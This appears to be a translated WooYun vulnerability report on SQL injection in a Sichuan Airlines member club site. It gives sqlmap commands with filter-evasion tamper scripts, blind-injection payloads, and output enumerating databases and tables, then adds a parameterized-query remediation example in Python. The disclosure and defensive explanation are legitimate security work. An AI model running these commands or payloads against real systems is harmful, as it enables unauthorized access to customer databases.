Defect ID: WooYun-2014-089008
Vulnerability title: Multiple SQL injection points in a Sichuan Airlines business system
Vendor: Sichuan Airlines (四川航空)
Author: 玉林嘎
Submitted: 2014-12-29 22:34
Published: 2015-02-10 22:36
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 17
Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling
Tags:
2014-12-29: Details sent to the vendor, awaiting vendor handling
2014-12-31: Vendor confirmed; details disclosed to the vendor only
2015-01-10: Details disclosed to core white hats and experts in the relevant field
2015-01-20: Details disclosed to regular white hats
2015-01-30: Details disclosed to intern white hats
2015-02-10: Details disclosed to the public
As in the title.
http://**.**.**.**/FFPNewWeb/ Sichuan Airlines Member Club (四川航空会员俱乐部)
Two queries; every parameter is injectable.
1. sqlmap -u "http://**.**.**.**/FFPNewWeb/Mileage/QueryFlightRedeemRule" --data "AirlineCode=3U&OrgCity=CTU&DesCity=CAN&Page_Index=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent
sqlmap identified the following injection points with a total of 116 HTTP(s) requests:
---
Place: POST
Parameter: AirlineCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: AirlineCode=3U' AND 8979=8979 AND 'HGlz'='HGlz&OrgCity=CTU&DesCity=CAN&Page_Index=1

Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: AirlineCode=3U' AND 2329=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(121)||CHR(114)||CHR(101),5) AND 'tPVD'='tPVD&OrgCity=CTU&DesCity=CAN&Page_Index=1
---
[20:05:03] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[20:05:03] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
sqlmap -u "http://**.**.**.**/FFPNewWeb/Mileage/QueryFlightRedeemRule" --data "AirlineCode=3U&OrgCity=CTU&DesCity=CAN&Page_Index=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent --dbs
available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCAR
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
sqlmap -u "http://**.**.**.**/FFPNewWeb/Mileage/QueryFlightRedeemRule" --data "AirlineCode=3U&OrgCity=CTU&DesCity=CAN&Page_Index=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent -D SCAR --tables
[20:31:16] [INFO] fetching number of tables for database 'SCAR'
[20:31:16] [INFO] resumed: 373
[20:31:16] [INFO] resumed: TBL_20110831_PRO
[20:31:16] [INFO] resuming partial value: BCK
[20:31:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:31:16] [INFO] retrieved: _LOG
[20:31:52] [INFO] retrieved: CJ_DLYP
[20:33:02] [INFO] retrieved: CJ_DLYPTMP
[20:33:44] [INFO] retrieved: CJ_ERRDES
[20:34:56] [INFO] retrieved: CJ_FLGAP
[20:35:58] [INFO] retrieved: CJ_FLGAT
[20:36:31] [INFO] retrieved: CJ_FLGAT_HIS
[20:37:35] [INFO] retrieved: CJ_FLTCN
[20:38:23] [INFO] retrieved: CJ_FLTCNTMP
[20:39:07] [INFO] retrieved: CJ_FLTCNTMQ
[20:39:41] [INFO] retrieved: CJ_IRFLP
[20:40:45] [INFO] retrieved: CJ_IRFLPTMP
[20:41:40] [INFO] retrieved: CJ_IRFLPTMQ
[20:42:14] [INFO] retrieved: CJ_IRFLP_BAK
[20:43:17] [INFO] retrieved: CJ_IRFLP_HIS
[20:44:07] [INFO] retrieved: CJ_OPDES
[20:45:04] [INFO] retrieved: CJ_OPERATORS
[20:46:16] [INFO] retrieved: CJ_OPGAT
[20:46:57] [INFO] retrieved: CJ_PNRPTMP
[20:48:11] [INFO] retrieved: CJ_RECORDNUM
[20:49:39] [INFO] retrieved: CJ_VAFLP
[20:50:40] [INFO] retrieved: CJ_VAFLPTMP
[20:51:27] [INFO] retrieved: PERSON
[20:52:28] [INFO] retrieved: PLAN_TABLE
[20:53:58] [INFO] retrieved: TBL_ACTION
[20:55:31] [INFO] retrieved: TBL_ADDRESS_CITY
[20:57:26] [INFO] retrieved: TBL_AIRLINE
[20:58:31] [INFO] retrieved: TBL_AIRLINE_CODE_SHARE
[21:00:30] [INFO] retrieved: TBL_AIRPORT
[21:01:21] [INFO] retrieved: TBL_AUDITOR
[21:02:31] [INFO] retrieved: TBL_BUSINESS_TYPE
[21:04:32] [INFO] retrieved: TBL_CHARACTER_SPELL_INDEX
[21:07:47] [INFO] retrieved: TBL_CITY
[21:08:29] [INFO] retrieved: TBL_CLASS
[21:09:17] [INFO] retrieved: TBL_CLASS_MULTIPLIER_RULE
[21:11:47] [INFO] retrieved: TBL_CLASS_TYPE
[21:12:33] [INFO] retrieved: TBL_COMPANY_ACCOUNT
[21:14:52] [INFO] retrieved: TBL_COMPANY_EXTRA_ACTIVITY
[21:17:38] [INFO] retrieved: TBL_COMPANY_FLIGHT_ACTIVITY
[21:20:22] [INFO] retrieved: TBL_COMPANY_FLIGHT_REDEEM
[21:21:51] [INFO] retrieved: TBL_COMPANY_FLIGHT_REDEEM_IRR
[21:23:17] [INFO] retrieved: TBL_COMPANY_FLIGHT_REDEEM_TEM
[21:24:36] [INFO] retrieved: TBL_COMPANY_ID_CHANGE_HIS
[21:27:01] [INFO] retrieved: TBL_COMPANY_ID_MERGE_HIS
[21:29:01] [INFO] retrieved: TBL_COMPANY_INFO
[21:29:55] [INFO] retrieved: TBL_COMPANY_MEMBER
[21:31:14] [INFO] retrieved: TBL_COMPANY_MILE_EXPIRE_ACT
[21:34:09] [INFO] retrieved: TBL_COMPANY_NFLT_REDEEM
[21:36:26] [INFO] retrieved: TBL_COMPANY_NFLT_REDEEM_TEMP
[21:38:00] [INFO] retrieved: TBL_COMPANY_NFLT_REJECT_REDEEM
[21:40:11] [INFO] retrieved: TBL_COMPANY_PIN_CHANGE_HISTORY
[21:43:30] [INFO] retrieved: TBL_COMPANY_SPECIAL_SEGMENT
[21:46:08] [INFO] retrieved: TBL_COMPANY_TYPE
[21:47:18] [INFO] retrieved: TBL_COUNTRY
[21:48:20] [INFO] retrieved: TBL_CREDIT_CARD_COMPANY
2. sqlmap -u "http://**.**.**.**/FFPNewWeb/Mileage/QuerySegmentMiles" --data "OrgCity=CTU&DesCity=CAN" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent
sqlmap identified the following injection points with a total of 51 HTTP(s) requests:
---
Place: POST
Parameter: OrgCity
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: OrgCity=CTU') AND 6813=6813 AND ('WPeh'='WPeh&DesCity=CAN

Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: OrgCity=CTU') AND 1355=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(114)||CHR(112)||CHR(77),5) AND ('OdJe'='OdJe&DesCity=CAN
---
[20:08:53] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[20:08:53] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
Same as the first one.
Filter the input.
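The remediation above is a single word, "filter". The root cause sqlmap's output points to is user input concatenated into SQL text, and the durable fix is a bound parameter rather than a keyword filter. The following is an added example, not code from the report or from the airline's application: it rebuilds the QueryFlightRedeemRule lookup in miniature, with sqlite3 standing in for the Oracle back end the report identifies, and with a constructed table and column names that are assumptions, not the real schema. It runs the report's boolean-based blind payload for AirlineCode against the concatenating form and against the parameterized form, so the difference in behaviour is visible.

```python
"""Added example (not from the WooYun report): string concatenation versus a
bound parameter for the redeem-rule lookup.  sqlite3 stands in for the Oracle
back end; table 'redeem_rule' and its columns are constructed for this demo and
are an assumption, not the airline's schema."""
import sqlite3


def build_db():
    # Constructed sample data modelled on the report's request parameters
    # (AirlineCode=3U, OrgCity=CTU, DesCity=CAN).
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE redeem_rule "
        "(airline_code TEXT, org_city TEXT, des_city TEXT, miles INTEGER)"
    )
    con.executemany(
        "INSERT INTO redeem_rule VALUES (?, ?, ?, ?)",
        [("3U", "CTU", "CAN", 8000), ("3U", "CTU", "PEK", 12000)],
    )
    return con


def query_vulnerable(con, airline_code, org_city, des_city):
    # The pattern behind the finding: request values spliced into the SQL text,
    # so a quote in a value ends the literal and the rest is parsed as SQL.
    sql = (
        "SELECT miles FROM redeem_rule WHERE airline_code = '%s' "
        "AND org_city = '%s' AND des_city = '%s'"
        % (airline_code, org_city, des_city)
    )
    return [row[0] for row in con.execute(sql)]


def query_parameterized(con, airline_code, org_city, des_city):
    # Hardened form: placeholders in the statement, values passed separately.
    # The driver sends them as data; a quote inside a value is just a character.
    sql = (
        "SELECT miles FROM redeem_rule WHERE airline_code = ? "
        "AND org_city = ? AND des_city = ?"
    )
    return [row[0] for row in con.execute(sql, (airline_code, org_city, des_city))]


def demo():
    con = build_db()
    legit = "3U"
    # The boolean-based blind payload sqlmap reported for AirlineCode, and the
    # same payload with the numeric comparison made false.  "Blind" means the
    # attacker learns one bit from whether the normal response comes back.
    true_branch = "3U' AND 8979=8979 AND 'HGlz'='HGlz"
    false_branch = "3U' AND 8979=8980 AND 'HGlz'='HGlz"
    return {
        # Concatenation: the response depends on the truth of the injected condition.
        "vuln_legit": query_vulnerable(con, legit, "CTU", "CAN"),    # [8000]
        "vuln_true": query_vulnerable(con, true_branch, "CTU", "CAN"),   # [8000]
        "vuln_false": query_vulnerable(con, false_branch, "CTU", "CAN"), # []
        # Bound parameter: the payload is compared as a literal airline code
        # and simply matches nothing, whatever condition it carries.
        "safe_legit": query_parameterized(con, legit, "CTU", "CAN"),     # [8000]
        "safe_true": query_parameterized(con, true_branch, "CTU", "CAN"),   # []
        "safe_false": query_parameterized(con, false_branch, "CTU", "CAN"), # []
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The same change applies to the Oracle time-based payload in the report, since `DBMS_PIPE.RECEIVE_MESSAGE` only runs when the text is parsed as SQL. Note that the sqlmap command in the report already loads the between, randomcase and space2comment tamper scripts, whose purpose is to get past keyword and whitespace filters, so a filter on its own is defense in depth at best; on the ASP.NET and Oracle stack the report identifies, the equivalent of the parameterized form is an `OracleCommand` with bound `Parameters`, and a WAF or input filter should sit in front of that, not replace it.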
Severity: Medium
Vulnerability Rank: 9
Confirmed: 2014-12-31 17:12
CNVD has confirmed the described situation and has notified the organization administering the website through the handling channel established previously.
None yet.
--tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent --dbs: isn't it --tamper=randomcase.py? Author, please explain. And also this --random-agent.